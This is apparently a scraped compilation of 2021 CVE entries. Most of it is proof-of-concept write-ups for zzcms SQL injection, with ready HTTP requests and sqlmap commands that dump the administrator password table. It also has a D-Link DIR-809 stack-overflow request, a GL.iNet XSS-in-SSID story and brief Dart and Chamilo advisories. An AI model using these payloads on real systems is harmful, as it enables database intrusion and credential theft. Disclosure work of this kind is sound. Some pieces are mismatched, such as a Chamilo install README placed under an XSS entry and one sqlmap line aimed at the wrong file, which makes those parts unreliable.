When using the dart pub publish command to publish a package to a third-party package server, the request would be authenticated with an oauth2 access_token that is valid for publishing on pub.dev. Using these obtained credentials, an attacker can impersonate the user on pub.dev. We recommend upgrading past https://github.com/dart-lang/sdk/commit/d787e78d21e12ec1ef712d229940b1172aafcdf8 or beyond version 2.15.0 

CVE-2021-22568: sdk/CHANGELOG.md at main · dart-lang/sdk

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, abd 2021 in dl/dl_download.php. when registering ordinary users.

**ZZCMS2021\_sqlinject\_1****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `dl/dl_download.php`

<?php
include("../inc/conn.php");
...
#line 11-21
$id\="";
$i\=0;
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $id\=$id.($\_POST\['id'\]\[$i\].',');	
	}
}else{
	$founderr\=1;
	$ErrMsg\="<li>操作失败！请先选中要下载的信息</li>";
}
$id\=substr($id,0,strlen($id)-1);//去除最后面的","
...
#line 68-72
if (strpos($id,",")>0){
$sql\="select \* from zzcms\_dl where passed=1 and id in (". $id .") order by id desc";
}else{
$sql\="select \* from zzcms\_dl where passed=1  and id='$id'";
}

Before you exploit the vulnerability, you need to visit this link to register users:

http://127.0.0.1/reg/userreg.php

When you have an account, visit this link and the POC is as follows.

POC:

    POST /dl/dl_download.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/dl/dl_download.php
    Cookie: UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827000715985.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/dl/dl\_download.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827002132182.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_download.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827003242950.png

CVE-2021-40282: ZZCMS2021 sqlinject(1)

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 in dl/dl_print.php when registering ordinary users.

**ZZCMS2021\_sqlinject\_2****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `dl/dl_print.php`

<?php
include("../inc/conn.php");
...
#line 29-40
$id\="";
$i\=0;
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $id\=$id.($\_POST\['id'\]\[$i\].',');
    }
	
}else{
	$founderr\=1;
	$ErrMsg\="<li>操作失败！请先选中要下载的信息</li>";
}
$id\=substr($id,0,strlen($id)-1);//去除最后面的","
...
#line 77-83
if (strpos($id,",")>0){
	$sql\="select \* from zzcms\_dl where passed=1 and id in (". $id .") ";
	}else{
	$sql\="select \* from zzcms\_dl where passed=1  and id=".$id." order by id desc";
}
	
$rs\=query($sql);

Before you exploit the vulnerability, you need to visit this link to register users:

http://127.0.0.1/reg/userreg.php

When you have an account, visit this link and the POC is as follows.

POC:

    POST /dl/dl_download.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/dl/dl_download.php
    Cookie: UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827005508639.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827005636669.png)

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827010301240.png)

CVE-2021-40281: ZZCMS2021 sqlinject(2)

An SQL Injection vulnerablitly exits in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/dl_sendmail.php.

**ZZCMS2021\_sqlinject\_4****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `admin/dl_sendmail.php`

<?php 
include("admin.php");
...
#line 17-38
include("../inc/mail\_class.php");
checkadminisdo("dl");
$id\="";
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $ids\=$\_POST\['id'\]\[$i\];
	$ids\=explode("|",$ids);
	//$id=$ids\[0\];
	$id\=$id.($ids\[0\].',');
	}
	$id\=substr($id,0,strlen($id)-1);//去除最后面的","
}else{
echo "<script lanage='javascript'>alert('操作失败！至少要选中一条信息。');window.opener=null;window.open('','\_self');window.close()</script>";
exit;
}

if (strpos($id,",")>0){
$sql\="select \* from zzcms\_dl where saver<>'' and id in (". $id .")";//没有接收人的，非留言类代理不用发提示邮件。
}else{
$sql\="select \* from zzcms\_dl where saver<>'' and id='".$id."'";
}
$rs\=query($sql);

**Before you exploit this vulnerability, you need to find a way to obtain the permission of background administrator**

After you obtain the administrator user rights and log in, visit the following link to exploit the vulnerability:

http://yourhost/admin/dl\_sendmail.php

POC:

    POST /admin/dl_sendmail.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/admin/dl_sendmail.php
    Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(5)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827014436700.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/admin/dl\_sendmail.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --flush-session --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827014910309.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/admin/dl\_sendmail.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827015328234.png

CVE-2021-40280: ZZCMS2021 sqlinject(4)

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/bad.php.

**ZZCMS2021\_sqlinject\_3****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `/admin/bad.php`

<?php include("admin.php");?>
...
#line 10-41
checkadminisdo("badusermessage");
$action=isset($\_REQUEST\["action"\])?$\_REQUEST\["action"\]:'';
if ($action<\>""){
	$id="";
	if(!empty($\_POST\['id'\])){
    	for($i=0; $i<count($\_POST\['id'\]);$i++){
    	$id=$id.($\_POST\['id'\]\[$i\].',');
    	}
	$id=substr($id,0,strlen($id)-1);//去除最后面的","
	}

	if ($id==""){
	echo "<script\>alert('操作失败！至少要选中一条信息。');history.back();</script\>";
	}
}
if ($action=="del"){
	 if (strpos($id,",")\>0){
		$sql="delete from zzcms\_bad where id in (". $id .")";
	}else{
		$sql="delete from zzcms\_bad where id='$id'";
	}

query($sql);
echo "<script\>location.href\='bad.php'</script\>";
}
if ($action=="lockip"){
	 if (strpos($id,",")\>0){
		$sql="update  zzcms\_bad set lockip=1 where id in (". $id .")";
	}else{
		$sql="update  zzcms\_bad set lockip=1 where id='$id'";
	}
query($sql);

**Before you exploit this vulnerability, you need to find a way to obtain the permission of background administrator**

After you obtain the administrator user rights and log in, visit the following link to exploit the vulnerability:

http://yourhost/admin/bad.php

POC:

    POST /admin/bad.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 69
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/admin/bad.php
    Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    action=del&id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

**You can change the post parameter action to del or lockip**

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827011634912.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/admin/bad.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "action=del&id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --flush-session --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827012018026.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827012641294.png

CVE-2021-40279: ZZCMS2021 sqlinject(3)

GL.iNet GL-AR150 2.x before 3.x devices, configured as repeaters, allow cgi-bin/router_cgi?action=scanwifi XSS when an attacker creates an SSID with an XSS payload as the name.

**I accidentally got my 4th CVE.****CVE ID: CVE-2021-44148**

Don't get too excited, it's just an XSS. Just a standard XSS.

I’m about to go full recipe blog:

The story of this CVE begins in 2014 when I first heard of the wifi pineapple from Hak5. At the time, I was working in IT making 30k a year and paying for my ex-wife to go to college. I did not have $100 bucks or whatever it was to drop on a wifi-pineapple. In 2016 I saw blog articles like these:

*   http://sapinski.com/2016/02/13/wifi-pineapple-firmware-for-gl-inet-gl-ar150/
*   https://www.securityaddicted.com/2016/11/17/weaponizing-gl-inet-gl-ar150/
*   https://jerrygamblin.com/2016/04/11/turning-a-25-gl-ar150-into-a-100-wifipineapple/?platform=hootsuite

All claiming you could buy a $25 mini router and turn it into a wifi pineapple. I instantly bought one.

![](https://beaugraham.com/images/order.png)

But because of my 2x diagnosed ADHD/ADD I never even got as far as installing the wifi pineapple firmware. It had taken about a week to get to my house and by that time I had become obsessed with something else.

Fast forward to 2019.

I started working as a pentester in July-ish of 2019. Specifically working on web application pentests. At this time whenever I see something on Twitter or LinkedIn about something web-app pentest or bug bounty related, I read it. I came across this blog post:

https://infosecwriteups.com/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968

Reading this made me realize that literally any input could be an XSS and I thought to myself I may as well make an XSS SSID just in case for the future. I have Ubiquiti equipment at home so it was easy enough to create an SSID called <script>alert(2)</script>. Keep in mind that SSID’s have to be less than 32 characters.

Fast forward to late 2021. The pandemic has been “almost over” for a year now.

People are starting to go back into the office. I can’t really talk about what I was working on but for a pentest I needed a little router. I remembered back when I bought my GL-AR150 in 2016. I had since moved 5 times. In my last move I decided to index everything that was in each box so I found it relatively fast.

I plugged it in and connected to the default network it provided. After setting a root password, I logged in and started navigating around the menus to see if anything would be helpful for my pentest or if I should just install default openwrt.

![alert](https://beaugraham.com/images/alert.png)

Seemingly out of nowhere I get this popup. For about 4 seconds I was like “WUT….” and then it all clicked. I was on the repeater page where it searches for wifi networks. My SSID that I had made in 2019 finally did something.

At this point I just started laughing. I couldn't believe it. My wife thought something was wrong because of the noises that were coming out of my home office.

I didn’t have time to create a real XSS payload like I normally do but I still felt good about finding this one. I decided to take it just one step further using xsshunter.com.

As you remember an SSID can only be 32 characters. So my normal xsshunter payloads weren’t going to work. So instead I followed this blog post and created a short domain that forwarded to my normal xsshunter payload page:

https://medium.com/@mohameddaher/how-i-paid-2-for-1054-xss-bug-20-chars-blind-xss-payloads-12d32760897b

So now I have an SSID that has my xsshunter payload in it just in case this happens again. So now I’ll get notifications:

![](https://beaugraham.com/images/notification.png)

Something else to remember is that this was purchased in 2016. It had an extremely old firmware on it. So when I found this bug it was running on firmware version 2.19 and the bug was fixed in version 3 of the firmware. The current version as of writing is 3.203. More can be found here:

https://docs.gl-inet.com/en/3/release\_notes/

TL;DR:

XSS payload as WiFi SSID leads to reflected XSS.

Timeline:

*   Nov 16th 2021 Found bug
*   Nov 17th 2021 Notified company of bug via email
*   Bug has already been fixed in version 3.x of firmware.
*   Nov 20th submit for CVE
*   Nov 22nd CVE reserved

CVE-2021-44148: Beau Graham

Chamilo LMS v1.11.x was discovered to contain a SQL injection via the doc parameter in main/plagiarism/compilatio/upload.php.

CVE-2021-35414: Security issues - Chamilo LMS

D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function sub_80046EB4 in /formSetPortTr. This vulnerability is triggered via a crafted POST request.

**D-Link DIR809 Vulnerability**

The Vulnerability is in page `/formSetPortTr` which influences the latest version of this router OS.

The firmware version is DIR-809Ax\_FW1.12WWB03\_20190410

**Progress**

*   Confirmed by vendor.

**Vulnerability description**

In the function `sub_80046EB4`( page `/formSetPortTr` ), we find a stack overflow vulnerability, which allows attackers to execute arbitrary code on system via a crafted post request.

Here is the description of the first vulnerability,

1.  The `get_var` function extracts user input from the a http request. For example, the code below will extract the value of a key of format `"inputPortRng_%d"` in the http post request which is completely under the attacker's control.
2.  The string `v25` obtained from user is copied onto the stack using `strcpy` without checking its length. So we can make the stack buffer overflow in `v16`.

![2021-05-13_14h15_00](https://github.com/Lnkvct/IoT-poc/raw/master/D-Link-DIR809/vuln11/README/2021-05-13_14h15_00.png)

    POST /formSetPortTr.htm HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 4210
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.0.1/Advanced/Special_Applications.asp
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: uid=YF608CCB25
    Connection: close
    
    settingsChanged=1&curTime=1620559041239&HNAP_AUTH=6946CD2354C87A2E9E189EFFB61EECD9+1620559041&submit-url=%2FAdvanced%2FSpecial_Applications.asp&used_0=0&enabled_0=0&entry_name_0=aaa&trigPortRng_0=aa&trigPortPtc_0=6&sched_name_0=aaaaaaaaa&inputPortRng_0=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&inputPortPtc_0=6&used_1=0&enabled_1=0&entry_name_1=&trigPortRng_1=&trigPortPtc_1=6&sched_name_1=Always&inputPortRng_1=&inputPortPtc_1=6&used_2=0&enabled_2=0&entry_name_2=&trigPortRng_2=&trigPortPtc_2=6&sched_name_2=Always&inputPortRng_2=&inputPortPtc_2=6&used_3=0&enabled_3=0&entry_name_3=&trigPortRng_3=&trigPortPtc_3=6&sched_name_3=Always&inputPortRng_3=&inputPortPtc_3=6&used_4=0&enabled_4=0&entry_name_4=&trigPortRng_4=&trigPortPtc_4=6&sched_name_4=Always&inputPortRng_4=&inputPortPtc_4=6&used_5=0&enabled_5=0&entry_name_5=&trigPortRng_5=&trigPortPtc_5=6&sched_name_5=Always&inputPortRng_5=&inputPortPtc_5=6&used_6=0&enabled_6=0&entry_name_6=&trigPortRng_6=&trigPortPtc_6=6&sched_name_6=Always&inputPortRng_6=&inputPortPtc_6=6&used_7=0&enabled_7=0&entry_name_7=&trigPortRng_7=&trigPortPtc_7=6&sched_name_7=Always&inputPortRng_7=&inputPortPtc_7=6&used_8=0&enabled_8=0&entry_name_8=&trigPortRng_8=&trigPortPtc_8=6&sched_name_8=Always&inputPortRng_8=&inputPortPtc_8=6&used_9=0&enabled_9=0&entry_name_9=&trigPortRng_9=&trigPortPtc_9=6&sched_name_9=Always&inputPortRng_9=&inputPortPtc_9=6&used_10=0&enabled_10=0&entry_name_10=&trigPortRng_10=&trigPortPtc_10=6&sched_name_10=Always&inputPortRng_10=&inputPortPtc_10=6&used_11=0&enabled_11=0&entry_name_11=&trigPortRng_11=&trigPortPtc_11=6&sched_name_11=Always&inputPortRng_11=&inputPortPtc_11=6&used_12=0&enabled_12=0&entry_name_12=&trigPortRng_12=&trigPortPtc_12=6&sched_name_12=Always&inputPortRng_12=&inputPortPtc_12=6&used_13=0&enabled_13=0&entry_name_13=&trigPortRng_13=&trigPortPtc_13=6&sched_name_13=Always&inputPortRng_13=&inputPortPtc_13=6&used_14=0&enabled_14=0&entry_name_14=&trigPortRng_14=&trigPortPtc_14=6&sched_name_14=Always&inputPortRng_14=&inputPortPtc_14=6&used_15=0&enabled_15=0&entry_name_15=&trigPortRng_15=&trigPortPtc_15=6&sched_name_15=Always&inputPortRng_15=&inputPortPtc_15=6&used_16=0&enabled_16=0&entry_name_16=&trigPortRng_16=&trigPortPtc_16=6&sched_name_16=Always&inputPortRng_16=&inputPortPtc_16=6&used_17=0&enabled_17=0&entry_name_17=&trigPortRng_17=&trigPortPtc_17=6&sched_name_17=Always&inputPortRng_17=&inputPortPtc_17=6&used_18=0&enabled_18=0&entry_name_18=&trigPortRng_18=&trigPortPtc_18=6&sched_name_18=Always&inputPortRng_18=&inputPortPtc_18=6&used_19=0&enabled_19=0&entry_name_19=&trigPortRng_19=&trigPortPtc_19=6&sched_name_19=Always&inputPortRng_19=&inputPortPtc_19=6&used_20=0&enabled_20=0&entry_name_20=&trigPortRng_20=&trigPortPtc_20=6&sched_name_20=Always&inputPortRng_20=&inputPortPtc_20=6&used_21=0&enabled_21=0&entry_name_21=&trigPortRng_21=&trigPortPtc_21=6&sched_name_21=Always&inputPortRng_21=&inputPortPtc_21=6&used_22=0&enabled_22=0&entry_name_22=&trigPortRng_22=&trigPortPtc_22=6&sched_name_22=Always&inputPortRng_22=&inputPortPtc_22=6&used_23=0&enabled_23=0&entry_name_23=&trigPortRng_23=&trigPortPtc_23=6&sched_name_23=Always&inputPortRng_23=&inputPortPtc_23=6
    

**Acknowledgment**

Credit to @Ainevsia, @peanuts62, @Yu3H0 from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-33271: IoT-poc/D-Link-DIR809/vuln11 at master · Lnkvct/IoT-poc

chamilo-lms v1.11.14 is affected by a Cross Site Scripting (XSS) vulnerability in /plugin/jcapture/applet.php if an attacker passes a message hex2bin in the cookie.

**Chamilo 1.11.x**

![Build Status](https://camo.githubusercontent.com/aea4dedcfeccd389b971dbd8260df22698f6efffd894dfa41ee12029a54d28b1/68747470733a2f2f7472617669732d63692e6f72672f6368616d696c6f2f6368616d696c6f2d6c6d732e7376673f6272616e63683d312e31312e78) ![Scrutinizer Code Quality](https://camo.githubusercontent.com/5c8291b3300e9c54ce9a0ddc20cf6f01a4eab18b7b3795b490d373a3072e1845/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f7175616c6974792d73636f72652e706e673f623d312e31312e78) ![Code Coverage](https://camo.githubusercontent.com/f57a179067358901bced3e99e3e211a7641cd193d7e7ab373f34425c0b228896/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f636f7665726167652e706e673f623d312e31312e78) ![Bountysource](https://camo.githubusercontent.com/59eaeb4f05c9ff700681d0fd8ec30cb86a82f1a4c65efbf82ae2978ba71f16e2/68747470733a2f2f7777772e626f756e7479736f757263652e636f6d2f62616467652f7465616d3f7465616d5f69643d3132343339267374796c653d726169736564) ![Code Consistency](https://camo.githubusercontent.com/3bc66755dc2e12f4a374fb26d24ba33881ac3886baf05b5cf431df5b043d70ee/68747470733a2f2f737175697a6c6162732e6769746875622e696f2f5048505f436f6465536e69666665722f616e616c797369732f6368616d696c6f2f6368616d696c6f2d6c6d732f67726164652e737667) ![CII Best Practices](https://camo.githubusercontent.com/cece3b502cea381cfa2f8f9bfdc9bccf8a08d0353bad51e023691d49f32994d2/68747470733a2f2f626573747072616374696365732e636f7265696e6672617374727563747572652e6f72672f70726f6a656374732f3136362f6261646765) ![Codacy Badge](https://camo.githubusercontent.com/2657ea94f3334bacaab31f95ee9e7b8d959c5a0a832c6920bc04ed047b71f493/68747470733a2f2f6170692e636f646163792e636f6d2f70726f6a6563742f62616467652f47726164652f3838653933346161623266333462623761303339376136663632623037386232)

**Installation**

This installation guide is for development environments only.

**Install PHP, a web server and MySQL/MariaDB**

To run Chamilo, you will need at least a web server (we recommend Apache2 for commodity reasons), a database server (we recommend MariaDB but will explain MySQL for commodity reasons) and a PHP interpreter (and a series of libraries for it). If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

    sudo apt-get install apache2 mysql-server php libapache2-mod-php php-gd php-intl php-curl php-json php-mysql php-zip composer
    

**Install Git**

The development version 1.11.x requires you to have Git installed. If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

**Install Composer**

To run the development version 1.11.x, you need Composer, a libraries dependency management system that will update all the libraries you need for Chamilo to the latest available version.

Make sure you have Composer installed. If you do, you should be able to launch "composer" on the command line and have the inline help of composer show a few subcommands. If you don't, please follow the installation guide at https://getcomposer.org/download/

**Download Chamilo from GitHub**

Clone the repository

    sudo mkdir chamilo-1.11
    sudo chown -R `whoami` chamilo-1.11
    git clone -b 1.11.x --single-branch https://github.com/chamilo/chamilo-lms.git chamilo-1.11
    

Checkout branch 1.11.x

    cd chamilo-1.11
    git checkout --track origin/1.11.x
    git config --global push.default current
    

**Update dependencies using Composer**

From the Chamilo folder (in which you should be now if you followed the previous steps), launch:

If you face issues related to missing JS libraries, you might need to ensure that your web/assets folder is completely re-generated. Use this set of commands to do that:

    rm composer.lock
    rm -rf web/ vendor/
    composer clear-cache
    composer update
    

This will take several minutes in the best case scenario, but should definitely generate the missing files.

**Change permissions**

On a Debian-based system, launch:

    sudo chown -R www-data:www-data app main/default_course_document/images main/lang web
    

**Configure the web server**

Enable the Apache web server module "rewrite" :

    sudo a2enmod rewrite
    sudo systemctl restart apache2.service
    

Chamilo's .htaccess must be obeyed. Create /etc/apache2/conf-available/htaccessForChamilo.conf with these lines :

    <Directory /var/www/html/chamilo-lms>
    	AllowOverride All
    </Directory>
    

then enable it :

    sudo a2enconf htaccessForChamilo
    sudo systemctl reload apache2.service
    

If you just installed missing PHP extensions using apt, you must restart the web server to get them loaded :

    sudo systemctl restart apache2.service
    

**Start the installer**

In your browser, load the Chamilo URL. You should be automatically redirected to the installer. If not, add the "main/install/index.php" suffix manually in your browser address bar. The rest should be a matter of simple OK > Next > OK > Next...

**Upgrade from 1.10.x**

1.11.0 is a major version. It contains a series of new features, that also mean a series of new database changes in regards with versions 1.10.x. As such, it is necessary to go through an upgrade procedure when upgrading from 1.10.x to 1.11.x.

The upgrade procedure is relatively straightforward. If you have a 1.10.x initially installed with Git, here are the steps you should follow (considering you are already inside the Chamilo folder):

    git fetch --all
    git checkout origin 1.11.x
    

Then load the Chamilo URL in your browser, adding "main/install/index.php" and follow the upgrade instructions. Select the "Upgrade from 1.10.x" button to proceed.

